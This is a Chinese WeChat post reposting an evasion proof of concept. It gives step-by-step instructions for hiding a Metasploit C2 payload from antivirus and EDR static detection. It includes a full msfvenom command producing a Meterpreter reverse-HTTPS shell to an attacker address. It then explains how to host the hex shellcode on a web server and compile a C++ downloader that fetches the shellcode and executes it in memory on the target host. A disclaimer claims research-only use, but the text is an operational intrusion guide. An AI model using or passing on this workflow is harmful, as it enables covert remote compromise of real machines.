|
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。
|
现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!
项目介绍
此 POC 使您能够编译 .exe 以完全避免 AV/EPP/EDR 对您的 C2-shellcode 进行静态检测,并下载并执行托管在您的 (C2)-web 服务器上的 C2-shellcode。
通过该 POC,我们的优势在于,C2 反向 shell 的 shellcode 不作为字符串或 .bin 文件包含在 POC 中。
这样一来,我们就不存在 AV/EPP/EDR 静态检测 C2 shellcode 的问题,因为完整的 C2-shellcode 托管在Web服务器上。
1. 使用MSF-Venom创建stageless shellcode
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.0.1 LPORT=443 -fc --arch x64 --platform windows -o /tmp/meterx64.c
2. 服务器托管 MSF-stageless shellcode 的文件
根据 C++ POC 中的代码,托管的 shellcode 必须采用十六进制格式。
要将整个 MSF-shellcode 放在一行中,您可以使用 Notpad++ 中的行操作功能合并行,然后删除字符串中的非空格和双引号。
![免杀!躲避 AV/EPP/EDR 静态检测]( "免杀!躲避 AV/EPP/EDR 静态检测")
最后,您可以将带有无阶段 MSF-shellcode 的文件保存为没有任何文件类型结尾的文件,我们称之为更新,然后将 MSF-Shellcode 文件上传到您选择的Web服务器上。
3. 将 C++ POC 中的链接更改为您的 MSF-payload
我们将 POC 中的链接更改为我们托管无阶段 MSF-Shellcode 的 Web 服务器的链接,并在Visual Studio 中将其编译为 Release x64。
用 VS 编译后,你有一个 x64 二进制文件,它根本不包含任何 C2-shellcode 字符串或 .bin 文件,执行后 C2-shellcode 被下载并在目标主机的内存中执行。
目前,使用 Create Thread 执行 shellcode 是通过 WIN32 API 完成的。但是尽管不使用系统调用,POC 还是会做得很好
https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution
原文始发于微信公众号(Hack分享吧):免杀!躲避 AV/EPP/EDR 静态检测
评论